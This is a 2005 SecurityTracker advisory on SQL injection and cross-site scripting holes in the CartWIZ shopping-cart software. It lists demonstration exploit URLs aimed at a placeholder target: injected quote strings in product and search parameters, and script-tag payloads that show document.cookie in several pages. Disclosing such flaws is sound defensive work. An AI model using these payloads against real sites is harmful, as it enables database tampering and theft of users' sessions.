CartWIZ Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013792
SecurityTracker URL:  http://securitytracker.com/id/1013792
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 25 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes

Description:   Diabolic Crab reported several vulnerabilities in CartWIZ. A remote user can inject SQL commands and conduct cross-site scripting attacks.

Several scripts do not properly validate user-supplied input. A remote user can create specially crafted parameter values that will execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/cartWiz/store/addToCart.asp?idProduct='SQL_INJECTION&quantity=1

http://[target]/cartwiz/store/productDetails.asp?idProduct='SQL%20INJECTION

http://[target]/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo='SQL INJECTION&validate=1

http://[target]/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom='SQL INJECTION&priceTo=9999999999&validate=1

http://[target]/cartwiz/store/searchResults.asp?name=&idCategory='SQL INJECTION&sku=&priceFrom=0&priceTo=9999999999&validate=1

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the CartWIZ software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/cartwiz/store/tellAFriend.asp?idProduct='"><script>alert(document.cookie)</script>

http://[target]/cartwiz/store/addToWishlist.asp?idProduct='"><script>alert(document.cookie)</script>

http://[target]/cartwiz/store/access.asp?redirect='"><script>alert(document.cookie)</script>

http://[target]/cartWiz/store/error.asp?message='"><script>alert(document.cookie)</script>

http://[target]/cartwiz/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='"><script>alert(docum

http://[target]/cartwiz/store/login.asp?message='"><script>alert(document.cookie)</script>&redirect=

http://[target]/cartwiz/store/searchResults.asp?name=&idCategory=&sku='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&priceFrom=0&pr

http://[target]/cartwiz/store/searchResults.asp?name='"><script>alert(document.cookie)</script>&idCategory=&sku=&priceFrom=

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the CartWIZ software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
